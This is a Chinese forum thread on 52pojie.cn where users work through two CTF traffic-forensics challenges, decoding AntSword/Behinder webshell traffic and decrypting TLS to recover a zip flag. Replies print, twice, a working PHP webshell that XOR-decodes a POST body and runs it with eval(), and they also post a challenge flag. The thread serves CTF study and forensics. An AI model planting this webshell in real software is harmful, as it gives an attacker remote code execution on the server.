吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 772|回复: 16
收起左侧

[求助] 2个CTF流量题

[复制链接]
GoogleHacking 发表于 2024-6-26 17:05
本帖最后由 GoogleHacking 于 2024-6-26 19:33 编辑

题目1.数据被偷了的附件:https://wwo.lanzn.com/i4TE022sa2xi

题目2.简单流量题附件:https://wwo.lanzn.com/inS5U22sa35g


第2题导入了ssl.log。仍然无法解密数据包内容,没法导出flag.txt,求大佬指导

QQ图片20240626170418.png
第1题过滤出来了一些编码,看着像冰蝎的流量,但是看不懂什么意思,求大佬指导
QQ图片20240626170424.png

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Byxs20 发表于 2024-7-9 17:07
fy繁星 发表于 2024-6-26 23:35
,不知道这个Flag对不对?

肯定不对,安恒的题目的话,肯定是DASCTF{}
能提取一个这个出来,后面就不会了

[JavaScript] 纯文本查看 复制代码
async function pwdget(password) {
    const encoder = new TextEncoder();
    return window.crypto.subtle.importKey(
        "raw",
        encoder.encode(password),
        { name: "PBKDF2" },
        false,
        ["deriveBits", "deriveKey"]
    );
}

function arrBfToB64(buffer) {
    let binary = '';
    const bytes = new Uint8Array(buffer);
    for (let i = 0; i < bytes.length; i++) {
        binary += String.fromCharCode(bytes[i]);
    }
    return window.btoa(binary);
}

function Encrypt() {
    const plainText = "";
    const password = "";
    // const ivBase64 = "";
    const iv = "";

    const k = pwdget(password);
    const key = window.crypto.subtle.deriveKey(
        { name: "PBKDF2", salt: new TextEncoder().encode("hello-dasctf"), iterations: 100000, hash: 'SHA-256' },
        k,
        { name: "AES-GCM", length: 256 },
        true,
        ["encrypt", "decrypt"]
    );

    const encoder = new TextEncoder();
    const encodedText = encoder.encode(plainText);
    const ciphertext = window.crypto.subtle.encrypt(
        { name: "AES-GCM", iv },
        key,
        encodedText
    );

    const base64Ciphertext = arrBfToB64(ciphertext);
}
 楼主| GoogleHacking 发表于 2024-6-27 15:28
bushoukuaidi 发表于 2024-6-27 15:06
第二个 zip 采用crc32明文攻击  可以解开压缩里flag.txt  DASCTF{c956131a3e39707a19f88d4edaaa01d6}

第 ...

43b27fba4<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b";
    $bs="base64_"."decode";
        $after=$bs($data."");
        for($i=0;$i<strlen($after);$i++) {
            $after[$i] = $after[$i]^$key[$i+1&15];
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>59640d

就是这段代码。但是不知道怎么用,大佬能给指导下吗
你好,再见 发表于 2024-6-26 19:50
zunmx 发表于 2024-6-26 22:27
手头没电脑,用平板稍微看了一下,这确实超出了我的能力范围了。
第一题:
尝试一下http && http.response.code==200 过滤器
发现好多post payload,里面是php代码,分析一下执行的是什么,可能存在flag

image.png

第二题:
sslkey.log 是解密https流量的,但是我也没发现和不配置这个有啥差异,最终还是和上个帖子一样,找到个zip,并且不知道密码。
id:87的地方ctrl+alt+shift+t 导出raw,删除一下http响应头就是zip文件了。


图片的话,平板截图文件太大,上传不了,只能降低一下照片品质了。

等等论坛里的大牛来看看这些问题吧。
 楼主| GoogleHacking 发表于 2024-6-26 22:34
zunmx 发表于 2024-6-26 22:27
手头没电脑,用平板稍微看了一下,这确实超出了我的能力范围了。
第一题:
尝试一下http && http.respons ...

第一题看着像冰蝎的流量,但是太多了, 过滤了很多字符串做了解码,还是不行,第二题我不知道那个压缩包密码从哪里找,还有ssl.log怎么用
zunmx 发表于 2024-6-26 22:39
GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量,但是太多了, 过滤了很多字符串做了解码,还是不行,第二题我不知道那个压缩包 ...

ssl.log usage:

ctrl+shift+p
protocols --> tls --> (Pre)-Master-Secret log filename --> Browse...
fy繁星 发表于 2024-6-26 22:40
GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量,但是太多了, 过滤了很多字符串做了解码,还是不行,第二题我不知道那个压缩包 ...

第一题是蚁剑的流量(defalut编码器),用户上传了一个Shell.php,然后用蚁剑查看了upload下文件还上传了一个abc.php,但是看了一圈流量没看到什么有用的。这道题还有什么题目描述吗?
fy繁星 发表于 2024-6-26 23:35
GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量,但是太多了, 过滤了很多字符串做了解码,还是不行,第二题我不知道那个压缩包 ...

<?php
        //$flag = "qAjsBOZBJVwujoHDJKlEP5y1jFpJFCdGu74+1ueutAbtSQpasobqxvUwg8YvlfKEPk+KNc/gyno=";
?>,不知道这个Flag对不对?
fy繁星 发表于 2024-6-26 23:41
fy繁星 发表于 2024-6-26 23:35
,不知道这个Flag对不对?

tcp.stream eq 262,将这个流中的response的值用abc.php解密:<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b";
    $bs="base64_"."decode";
        $after=$bs($data."");
        for($i=0;$i<strlen($after);$i++) {
            $after[$i] = $after[$i]^$key[$i+1&15];
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
GoogleHacking + 1 + 1 热心回复!

查看全部评分

 楼主| GoogleHacking 发表于 2024-6-27 08:36
fy繁星 发表于 2024-6-26 23:35
,不知道这个Flag对不对?

这个是那个数据流?
 楼主| GoogleHacking 发表于 2024-6-27 08:55
fy繁星 发表于 2024-6-26 23:41
tcp.stream eq 262,将这个流中的response的值用abc.php解密:

这个是不是要写解密脚本啊
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 13:23

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表